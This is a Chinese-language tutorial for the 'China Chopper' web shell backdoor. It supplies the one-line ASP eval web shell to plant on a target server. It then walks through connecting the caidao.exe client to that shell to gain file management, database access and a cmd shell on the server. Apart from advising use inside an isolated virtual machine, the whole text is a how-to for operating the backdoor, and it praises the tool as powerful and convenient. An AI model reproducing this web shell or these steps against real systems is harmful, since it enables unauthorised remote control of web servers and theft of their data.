“中国菜刀”是一款由台湾技术大牛开发的web shell后门; 只论技术性,“中国菜刀”,配置简便、功能强大、使用方便,可以说是一款强大好用的“web管理工具”。
“中国菜刀”是一款由台湾技术大牛开发的web shell后门;
只论技术性,“中国菜刀”,配置简便、功能强大、使用方便,可以说是一款强大好用的“web管理工具”。
以下以ASP形式介绍“中国菜刀”使用方法,PHP、aspx形式类似。
1、获取“中国菜刀”安装介质
可从“中国菜刀”官网下载;目前,主流安全类软件(如:防病毒类软件、终端安全类软件)都会将“中国菜刀”视作黑客攻击类工具、而进行隔离;
因此,建议在虚拟机环境中使用“中国菜刀”;在使用时,建议将虚拟机网络设置为“主机专用网”方式、与其他网络隔离、确保安全。
2、目标环境配置
在目标环境中配置".asp"格式文件,例如“caidao.asp”,输入内容如下:
<%eval request("管理口令")%>
3、客户端使用
(1)双击打开“中国菜刀”的运行主程序:caidao.exe
(2)在主程序界面中右击选择“添加”,见下图:
(3)添加Shell
在“地址”中输入目标环境的asp页面地址,如:http://1.1.1.1/caidao.asp
在密码框中输入目标环境中配置的口令;
“脚本类型”选择“asp”;
参见下图:
(4)shell选择
连接成功后,共有3种shell可使用:文件管理、数据库管理、虚拟终端,
文件管理:即“资源管理器”,可对web服务器所在分区的各种资源进行管理;
数据库管理:即“数据库客户端”,可对web后台数据库进行管理;
虚拟终端:获得web服务器的cmd shell。
参见下图:
(5)“文件管理”shell示例参见下图:
(6)“数据管理”shell
完成配置后,可尝试连接数据库,配置过程参见以下图:
连接数据库成功后,可输入SQL语句进行使用,参见下图: